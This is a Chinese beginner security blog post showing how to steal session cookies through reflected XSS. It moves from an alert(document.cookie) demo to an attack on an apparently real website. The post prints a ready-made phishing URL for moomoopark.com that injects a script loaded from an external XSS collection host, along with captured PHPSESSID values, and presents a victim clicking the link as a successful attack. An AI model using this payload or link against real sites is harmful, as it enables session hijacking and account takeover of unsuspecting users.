网安入门17-XSS(打Cookie)
危害:获取Cookie
开始学习反射型XSS时不知道有什么危害,弹个1没啥用,于是我们利用经典的<script>alert(document.cookie)</script>
展开攻击
经过这波操作,我们获得了 敏感信息PHPSESSID=94a7gvd2icb3hva0u255jjadl0
反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie
打Cookie实战
目标:云图AI开放平台
来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie
发现一个搜索框,测试可以弹,证明这个网站存在XSS
此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台
XSS平台-XSS安全测试平台
在这个平台创建一个项目,选择无keepsession
查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接
恶意JS:<sCRiPt sRC=//xss.yt/WnT3></sCrIpT>
钓鱼链接:
1 | https://moomoopark.com/index.php?pro_keyword=%3CsCRiPt%20sRC=//xss.yt/WnT3%3E%3C/sCrIpT%3E&c=search&m=index |
zyh666访问钓鱼链接,测试可以收到cookie
其中PHPSESSID=k5ckg7164sldfd8dm4phom2qq5
接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!
其中PHPSESSID=3c4161sbsijrqoq8pjmhquus37
实战打Cookie成功
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Web渗透小趴菜!